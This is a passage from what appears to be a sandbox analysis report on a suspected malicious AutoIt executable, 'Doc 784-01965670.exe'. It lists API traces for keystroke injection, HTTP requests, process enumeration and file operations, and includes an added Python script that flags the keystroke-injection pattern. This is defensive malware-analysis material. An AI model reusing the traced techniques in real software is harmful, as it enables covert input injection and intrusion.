                                                                                                                                      • Part of subcall function 0044593E: AttachThreadInput.USER32(00000000,?,00000001,00478FA7), ref: 0044596B
                                                                                                                                    • MapVirtualKeyW.USER32(00000025,00000000), ref: 00445D15
                                                                                                                                    • PostMessageW.USER32(?,00000100,00000025,00000000), ref: 00445D35
                                                                                                                                    • Sleep.KERNEL32(00000000,?,00000100,00000025,00000000), ref: 00445D3F
                                                                                                                                    • MapVirtualKeyW.USER32(00000025,00000000), ref: 00445D45
                                                                                                                                    • PostMessageW.USER32(00000000,00000100,00000027,00000000), ref: 00445D66
                                                                                                                                    • Sleep.KERNEL32(00000000), ref: 00445D70
                                                                                                                                    • MapVirtualKeyW.USER32(00000025,00000000), ref: 00445D76
                                                                                                                                    • PostMessageW.USER32(?,00000101,00000027,00000000), ref: 00445D8B
                                                                                                                                    • Sleep.KERNEL32(00000000,?,00000101,00000027,00000000), ref: 00445D8F
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.2061979740.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.2061965369.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                    • Associated: 00000000.00000002.2062030409.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                    • Associated: 00000000.00000002.2062046963.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                    • Associated: 00000000.00000002.2062046963.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                    • Associated: 00000000.00000002.2062084175.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_Doc 784-01965670.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: MessagePostSleepThreadVirtual$AttachCurrentInputProcessWindow
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 2014098862-0
                                                                                                                                    • Opcode ID: 621277f82d70151dd5f553487d646ea3797e8fa9e9e6e4ab5ab83039983e6254
                                                                                                                                    • Instruction ID: b085f3065cf9cd100f04f322da00d4b037e108fc79bf5967fdabce1cd6d2e74b
                                                                                                                                    • Opcode Fuzzy Hash: 621277f82d70151dd5f553487d646ea3797e8fa9e9e6e4ab5ab83039983e6254
                                                                                                                                    • Instruction Fuzzy Hash: 7B116971790704B7F620AB958C8AF5A7399EF88B11F20080DF790AB1C1C9F5E4418B7C
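The API trace in the block above (AttachThreadInput in subcall 0044593E, then MapVirtualKeyW / PostMessageW / Sleep repeated with WM_KEYDOWN and WM_KEYUP) is a synthetic keystroke injection into another thread's window, but the report shows the message and virtual-key values only as raw hex. The following Python is an added example, not part of the Joe Sandbox report or its IDA plugin: it parses trace lines in the report's own format, decodes the Win32 constants (0x100 = WM_KEYDOWN, 0x101 = WM_KEYUP, 0x25 = VK_LEFT, 0x27 = VK_RIGHT, taken from the Windows SDK headers) and flags the AttachThreadInput + PostMessageW key-event combination. The sample trace embedded in it is copied from the twelve API lines of the block above; the function and field names are the example's own.

```python
"""Parse Joe Sandbox IDA-plugin API trace lines and flag synthetic keystroke
injection (AttachThreadInput followed by PostMessageW WM_KEYDOWN/WM_KEYUP).
Added example; not part of the Joe Sandbox report."""
import re
from dataclasses import dataclass
from typing import List, Optional, Tuple

# Win32 constants from the SDK headers; the trace prints them as raw hex only.
WM_NAMES = {0x100: "WM_KEYDOWN", 0x101: "WM_KEYUP"}
VK_NAMES = {0x25: "VK_LEFT", 0x26: "VK_UP", 0x27: "VK_RIGHT", 0x28: "VK_DOWN"}

# One trace line: optional "Part of subcall function XXXXXXXX:" prefix, then
# Api.MODULE(args), ref: XXXXXXXX. Calls without arguments have no parentheses.
_LINE = re.compile(
    r"^\s*•\s*(?:Part of subcall function (?P<sub>[0-9A-Fa-f]{8}):\s*)?"
    r"(?P<api>\w+)\.(?P<mod>\w+)(?:\((?P<args>[^)]*)\))?,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]{8})\s*$"
)

# Copied from the report's trace of function 00445D15 (with subcall 0044593E).
SAMPLE_TRACE = """
  • Part of subcall function 0044593E: GetWindowThreadProcessId.USER32(00000001,00000000), ref: 0044595D
  • Part of subcall function 0044593E: GetCurrentThreadId.KERNEL32 ref: 00445964
  • Part of subcall function 0044593E: AttachThreadInput.USER32(00000000,?,00000001,00478FA7), ref: 0044596B
• MapVirtualKeyW.USER32(00000025,00000000), ref: 00445D15
• PostMessageW.USER32(?,00000100,00000025,00000000), ref: 00445D35
• Sleep.KERNEL32(00000000,?,00000100,00000025,00000000), ref: 00445D3F
• MapVirtualKeyW.USER32(00000025,00000000), ref: 00445D45
• PostMessageW.USER32(00000000,00000100,00000027,00000000), ref: 00445D66
• Sleep.KERNEL32(00000000), ref: 00445D70
• MapVirtualKeyW.USER32(00000025,00000000), ref: 00445D76
• PostMessageW.USER32(?,00000101,00000027,00000000), ref: 00445D8B
• Sleep.KERNEL32(00000000,?,00000101,00000027,00000000), ref: 00445D8F
"""


@dataclass
class Call:
    api: str
    module: str
    args: List[str]          # raw argument text; unresolved values stay "?"
    ref: int                 # address of the call site
    subcall: Optional[int]   # address of the callee when the line is a subcall


def parse_trace(text: str) -> List[Call]:
    """Return every well-formed API line as a Call; other lines are ignored."""
    calls = []
    for line in text.splitlines():
        m = _LINE.match(line)
        if not m:
            continue
        args = [a.strip() for a in m["args"].split(",")] if m["args"] else []
        sub = int(m["sub"], 16) if m["sub"] else None
        calls.append(Call(m["api"], m["mod"], args, int(m["ref"], 16), sub))
    return calls


def _hex(v: str) -> Optional[int]:
    try:
        return int(v, 16)
    except ValueError:       # "?" or a symbolic argument
        return None


def decode_key_message(call: Call) -> Optional[Tuple[str, str]]:
    """PostMessageW(hWnd, Msg, wParam, lParam): name the key message and key."""
    if call.api != "PostMessageW" or len(call.args) < 3:
        return None
    msg, vk = _hex(call.args[1]), _hex(call.args[2])
    if msg not in WM_NAMES:
        return None
    key = VK_NAMES.get(vk, "?" if vk is None else f"VK_{vk:02X}")
    return WM_NAMES[msg], key


def find_keystroke_injection(calls: List[Call]) -> dict:
    """Flag when input queues are attached and key messages are posted."""
    attached = any(c.api == "AttachThreadInput" for c in calls)
    keys = [d for d in (decode_key_message(c) for c in calls) if d]
    return {"attached_input": attached, "keystrokes": keys,
            "suspicious": attached and bool(keys)}


if __name__ == "__main__":
    result = find_keystroke_injection(parse_trace(SAMPLE_TRACE))
    for event in result["keystrokes"]:
        print(*event)
    print("suspicious:", result["suspicious"])
```

On the report's own lines this yields WM_KEYDOWN VK_LEFT, WM_KEYDOWN VK_RIGHT, WM_KEYUP VK_RIGHT and a positive flag; the AttachThreadInput requirement keeps ordinary PostMessageW use in a process's own windows from matching.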
                                                                                                                                    APIs
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.2061979740.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.2061965369.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                    • Associated: 00000000.00000002.2062030409.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                    • Associated: 00000000.00000002.2062046963.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                    • Associated: 00000000.00000002.2062046963.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                    • Associated: 00000000.00000002.2062084175.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_Doc 784-01965670.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: AddressProc_malloc$_strcat_strlen
                                                                                                                                    • String ID: AU3_FreeVar
                                                                                                                                    • API String ID: 2184576858-771828931
                                                                                                                                    • Opcode ID: 111e65442873bd7cbffe48700b84114c079de58427b558a04ef4a5d95244f0f0
                                                                                                                                    • Instruction ID: c940ad03d776ce5ee908f8b881b33357b51647545ffc53e819ca791e1fdac2da
                                                                                                                                    • Opcode Fuzzy Hash: 111e65442873bd7cbffe48700b84114c079de58427b558a04ef4a5d95244f0f0
                                                                                                                                    • Instruction Fuzzy Hash: EDA18DB5604205DFC300DF59C480A2AB7E5FFC8319F1489AEE9554B362D739ED89CB8A
                                                                                                                                    APIs
                                                                                                                                    • mciSendStringW.WINMM(close all,00000000,00000000,00000000), ref: 00401D5A
                                                                                                                                    • DestroyWindow.USER32(?), ref: 0042A751
                                                                                                                                    • UnregisterHotKey.USER32(?), ref: 0042A778
                                                                                                                                    • FreeLibrary.KERNEL32(?), ref: 0042A822
                                                                                                                                    • VirtualFree.KERNEL32(?,00000000,00008000), ref: 0042A854
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.2061979740.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.2061965369.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062030409.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062046963.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062046963.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062084175.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_Doc 784-01965670.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: Free$DestroyLibrarySendStringUnregisterVirtualWindow
                                                                                                                                    • String ID: close all
                                                                                                                                    • API String ID: 4174999648-3243417748
                                                                                                                                    • Opcode ID: ddf39f1eda455a1c63d5a7d3271f56cd3ed42d138f3b783cbb3ca1597947a384
                                                                                                                                    • Instruction ID: e23b5dd52123a376b0379481fe8be5d2f02d07e70979f80a1c72d587d5a24a2c
                                                                                                                                    • Opcode Fuzzy Hash: ddf39f1eda455a1c63d5a7d3271f56cd3ed42d138f3b783cbb3ca1597947a384
                                                                                                                                    • Instruction Fuzzy Hash: FFA17075A102248FCB20EF55CC85B9AB3B8BF44304F5044EEE90967291D779AE85CF9D
                                                                                                                                    APIs
                                                                                                                                    • InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 0044AA5A
                                                                                                                                    • HttpOpenRequestW.WININET(00000000,00000000,?,00000000,00000000,00000000,?,00000000), ref: 0044AA8D
                                                                                                                                    • InternetQueryOptionW.WININET(00000000,0000001F,?,?), ref: 0044AAF9
                                                                                                                                    • InternetSetOptionW.WININET(00000000,0000001F,?,00000004), ref: 0044AB11
                                                                                                                                    • HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 0044AB20
                                                                                                                                    • HttpQueryInfoW.WININET(00000000,00000005,?,00000000,00000000), ref: 0044AB61
                                                                                                                                      • Part of subcall function 0044286A: GetLastError.KERNEL32(00000000,0044AA07,?,00000000,00000000,00000001,?,?), ref: 00442880
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.2061979740.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.2061965369.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062030409.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062046963.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062046963.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062084175.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_Doc 784-01965670.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: HttpInternet$OptionQueryRequest$ConnectErrorInfoLastOpenSend
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 1291720006-3916222277
                                                                                                                                    • Opcode ID: fd0d9a71f1b9f9aed2e07c44adb1cce69882d59a8a6dee97d1abd644e851efd9
                                                                                                                                    • Instruction ID: 782b6278bf246bef60821ca34847c3ce69a0d92f774604c9678bedd135ce19ea
                                                                                                                                    • Opcode Fuzzy Hash: fd0d9a71f1b9f9aed2e07c44adb1cce69882d59a8a6dee97d1abd644e851efd9
                                                                                                                                    • Instruction Fuzzy Hash: 9C51E6B12803016BF320EB65CD85FBBB7A8FB89704F00091EF74196181D7B9A548C76A
                                                                                                                                    APIs
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.2061979740.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.2061965369.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062030409.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062046963.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062046963.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062084175.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_Doc 784-01965670.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: ErrorLastselect
                                                                                                                                    • String ID: HH
                                                                                                                                    • API String ID: 215497628-2761332787
                                                                                                                                    • Opcode ID: 8403caabb69194ab749b3558b6d17cf16ba223cf5fbe2e3d1d341ca8c1bfc534
                                                                                                                                    • Instruction ID: a252b81ccbce03d1e7b1b0efababa2c0a0929072778302a7b1202b90a7697d70
                                                                                                                                    • Opcode Fuzzy Hash: 8403caabb69194ab749b3558b6d17cf16ba223cf5fbe2e3d1d341ca8c1bfc534
                                                                                                                                    • Instruction Fuzzy Hash: BF51E4726043005BD320EB65DC42F9BB399EB94324F044A2EF558E7281EB79E944C7AA
                                                                                                                                    APIs
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.2061979740.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.2061965369.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062030409.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062046963.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062046963.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062084175.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_Doc 784-01965670.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: __snwprintf__wcsicoll_wcscpy
                                                                                                                                    • String ID: , $$0vH$AUTOITCALLVARIABLE%d$CALLARGARRAY
                                                                                                                                    • API String ID: 1729044348-3708979750
                                                                                                                                    • Opcode ID: e5856c69d37335927e932bb259c431c810e65197c095b32473e915812f67d75c
                                                                                                                                    • Instruction ID: 823d0c4529048d9f890bbf28e75db1a658c609af9319d28fcdda535ef0d13f31
                                                                                                                                    • Opcode Fuzzy Hash: e5856c69d37335927e932bb259c431c810e65197c095b32473e915812f67d75c
                                                                                                                                    • Instruction Fuzzy Hash: E651A571514300ABD610EF65C882ADFB3A4EFC4348F048D2FF54967291D779E949CBAA
                                                                                                                                    APIs
                                                                                                                                      • Part of subcall function 0040FFB0: GetFullPathNameW.KERNEL32(00000000,00000104,C:\Users\user\Desktop\Doc 784-01965670.exe,?,C:\Users\user\Desktop\Doc 784-01965670.exe,004A8E80,C:\Users\user\Desktop\Doc 784-01965670.exe,0040F3D2), ref: 0040FFCA
                                                                                                                                    • lstrcmpiW.KERNEL32(?,?), ref: 0044BC04
                                                                                                                                    • MoveFileW.KERNEL32(?,?), ref: 0044BC38
                                                                                                                                    • _wcscat.LIBCMT ref: 0044BCAA
                                                                                                                                    • _wcslen.LIBCMT ref: 0044BCB7
                                                                                                                                    • _wcslen.LIBCMT ref: 0044BCCB
                                                                                                                                    • SHFileOperationW.SHELL32 ref: 0044BD16
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.2061979740.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.2061965369.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062030409.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062046963.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062046963.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062084175.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_Doc 784-01965670.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: File_wcslen$FullMoveNameOperationPath_wcscatlstrcmpi
                                                                                                                                    • String ID: \*.*
                                                                                                                                    • API String ID: 2326526234-1173974218
                                                                                                                                    • Opcode ID: 79917c867e5dc746cbfe3ebb0135d92afbab4952e7fca4f485a184e9ce72b521
                                                                                                                                    • Instruction ID: 9e4979448571685848097db6772507fbfe8bfb8d1337cd0032b1ea927bdad9db
                                                                                                                                    • Opcode Fuzzy Hash: 79917c867e5dc746cbfe3ebb0135d92afbab4952e7fca4f485a184e9ce72b521
                                                                                                                                    • Instruction Fuzzy Hash: 4B3183B14083019AD724EF21C5D5ADFB3E4EFC8304F444D6EB98993251EB39E608D7AA
                                                                                                                                    APIs
                                                                                                                                      • Part of subcall function 00436328: _wcsncpy.LIBCMT ref: 0043633C
                                                                                                                                    • _wcslen.LIBCMT ref: 004366DD
                                                                                                                                    • GetFileAttributesW.KERNEL32(?), ref: 00436700
                                                                                                                                    • GetLastError.KERNEL32 ref: 0043670F
                                                                                                                                    • CreateDirectoryW.KERNEL32(00000000,00000000), ref: 00436727
                                                                                                                                    • _wcsrchr.LIBCMT ref: 0043674C
                                                                                                                                      • Part of subcall function 004366BE: CreateDirectoryW.KERNEL32(?,00000000,?,00000000,00000000), ref: 0043678F
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.2061979740.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.2061965369.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062030409.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062046963.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062046963.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062084175.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_Doc 784-01965670.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: CreateDirectory$AttributesErrorFileLast_wcslen_wcsncpy_wcsrchr
                                                                                                                                    • String ID: \
                                                                                                                                    • API String ID: 321622961-2967466578
                                                                                                                                    • Opcode ID: 3d3187412736f1559758a6cd6e40f0a594bd5d43c4c9ea1cccac3023e941b0f8
                                                                                                                                    • Instruction ID: 68cadaa88695c7c006562ade17844284f7fc34f8e7e15af3b97584e331f528d6
                                                                                                                                    • Opcode Fuzzy Hash: 3d3187412736f1559758a6cd6e40f0a594bd5d43c4c9ea1cccac3023e941b0f8
                                                                                                                                    • Instruction Fuzzy Hash: 3C2148765003017ADB20A724EC47AFF33989F95764F90993EFD14D6281E779950882AE
APIs
Strings
Memory Dump Source
• Source File: 00000000.00000002.2061979740.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2061965369.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2062030409.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2062046963.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2062046963.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2062084175.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_Doc 784-01965670.jbxd
Similarity
• API ID: __wcsnicmp
• String ID: #OnAutoItStartRegister$#notrayicon$#requireadmin
• API String ID: 1038674560-2734436370
APIs
• EnumProcesses.PSAPI(?,00000800,?,?,00444263,?,?,?), ref: 00436EEC
• OpenProcess.KERNEL32(00000410,00000000,?,?,?), ref: 00436F44
• EnumProcessModules.PSAPI(00000000,?,00000004,?), ref: 00436F59
• GetModuleBaseNameW.PSAPI(00000000,?,?,00000104,00000000,?,00000004,?), ref: 00436F71
• __wsplitpath.LIBCMT ref: 00436FA0
• _wcscat.LIBCMT ref: 00436FB2
• __wcsicoll.LIBCMT ref: 00436FC4
• CloseHandle.KERNEL32(00000000,00000000,?,?,00000104,00000000,?,00000004,?), ref: 00437003
Memory Dump Source
• Source File: 00000000.00000002.2061979740.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2061965369.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2062030409.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2062046963.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2062046963.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2062084175.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_Doc 784-01965670.jbxd
Similarity
• API ID: EnumProcess$BaseCloseHandleModuleModulesNameOpenProcesses__wcsicoll__wsplitpath_wcscat
• String ID:
• API String ID: 2903788889-0
APIs
• DeleteObject.GDI32(?), ref: 0044157D
• GetDC.USER32(00000000), ref: 00441585
• GetDeviceCaps.GDI32(00000000,0000005A), ref: 00441590
• ReleaseDC.USER32(00000000,00000000), ref: 0044159B
• CreateFontW.GDI32(?,00000000,00000000,00000000,?,000000FF,000000FF,000000FF,00000001,00000004,00000000,?,00000000,00000000), ref: 004415E9
• SendMessageW.USER32(?,00000030,00000000,00000001), ref: 00441601
• MoveWindow.USER32(?,?,?,?,?,00000000), ref: 00441639
• SendMessageW.USER32(?,00000142,00000000,00000000), ref: 00441659
Memory Dump Source
• Source File: 00000000.00000002.2061979740.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2061965369.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2062030409.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2062046963.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2062046963.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2062084175.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_Doc 784-01965670.jbxd
Similarity
• API ID: MessageSend$CapsCreateDeleteDeviceFontMoveObjectReleaseWindow
• String ID:
• API String ID: 3864802216-0
APIs
• _memset.LIBCMT ref: 00401257
  • Part of subcall function 00401BE0: _memset.LIBCMT ref: 00401C62
  • Part of subcall function 00401BE0: _wcsncpy.LIBCMT ref: 00401CA1
  • Part of subcall function 00401BE0: _wcscpy.LIBCMT ref: 00401CBD
  • Part of subcall function 00401BE0: Shell_NotifyIconW.SHELL32(00000001,?), ref: 00401CCF
• KillTimer.USER32(?,?), ref: 004012B0
• SetTimer.USER32(?,?,000002EE,00000000), ref: 004012BF
• Shell_NotifyIconW.SHELL32(?,?), ref: 0042AA80
• Shell_NotifyIconW.SHELL32(?,?), ref: 0042AACC
• Shell_NotifyIconW.SHELL32(?,?), ref: 0042AB0F
Memory Dump Source
• Source File: 00000000.00000002.2061979740.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2061965369.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2062030409.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2062046963.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2062046963.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2062084175.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_Doc 784-01965670.jbxd
Similarity
• API ID: IconNotifyShell_$Timer_memset$Kill_wcscpy_wcsncpy
• String ID:
• API String ID: 1792922140-0
APIs
• ___set_flsgetvalue.LIBCMT ref: 004140E1
  • Part of subcall function 00416A84: TlsGetValue.KERNEL32(00411739,00416C10,?,00411739,00417F28,00413979,?,?,00411739,?,00401C0B), ref: 00416A8D
  • Part of subcall function 00416A84: __decode_pointer.LIBCMT ref: 00416A9F
  • Part of subcall function 00416A84: TlsSetValue.KERNEL32(00000000,00411739,00417F28,00413979,?,?,00411739,?,00401C0B), ref: 00416AAE
• ___fls_getvalue@4.LIBCMT ref: 004140EC
  • Part of subcall function 00416A64: TlsGetValue.KERNEL32(?,?,004140F1,00000000), ref: 00416A72
• ___fls_setvalue@8.LIBCMT ref: 004140FF
  • Part of subcall function 00416AB8: __decode_pointer.LIBCMT ref: 00416AC9
• GetLastError.KERNEL32(00000000,?,00000000), ref: 00414108
• ExitThread.KERNEL32 ref: 0041410F
• GetCurrentThreadId.KERNEL32 ref: 00414115
• __freefls@4.LIBCMT ref: 00414135
• __IsNonwritableInCurrentImage.LIBCMT ref: 00414148
Memory Dump Source
• Source File: 00000000.00000002.2061979740.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2061965369.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2062030409.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2062046963.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2062046963.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2062084175.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_Doc 784-01965670.jbxd
Similarity
• API ID: Value$CurrentThread__decode_pointer$ErrorExitImageLastNonwritable___fls_getvalue@4___fls_setvalue@8___set_flsgetvalue__freefls@4
• String ID:
• API String ID: 1925773019-0
APIs
• VariantClear.OLEAUT32(00000038), ref: 004357C3
• VariantClear.OLEAUT32(00000058), ref: 004357C9
• VariantClear.OLEAUT32(00000068), ref: 004357CF
• VariantClear.OLEAUT32(00000078), ref: 004357D5
• VariantClear.OLEAUT32(00000088), ref: 004357DE
• VariantClear.OLEAUT32(00000048), ref: 004357E4
• VariantClear.OLEAUT32(00000098), ref: 004357ED
• VariantClear.OLEAUT32(000000A8), ref: 004357F6
Memory Dump Source
• Source File: 00000000.00000002.2061979740.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2061965369.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2062030409.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2062046963.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2062046963.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2062084175.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_Doc 784-01965670.jbxd
Similarity
• API ID: ClearVariant
• String ID:
• API String ID: 1473721057-0
APIs
• WSAStartup.WSOCK32(00000101,?), ref: 00464ADE
  • Part of subcall function 0045EFE7: WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,00000000,00000000,00000000,?,?,?,0047D14B,?,?,?,?), ref: 0045F003
• inet_addr.WSOCK32(?), ref: 00464B1F
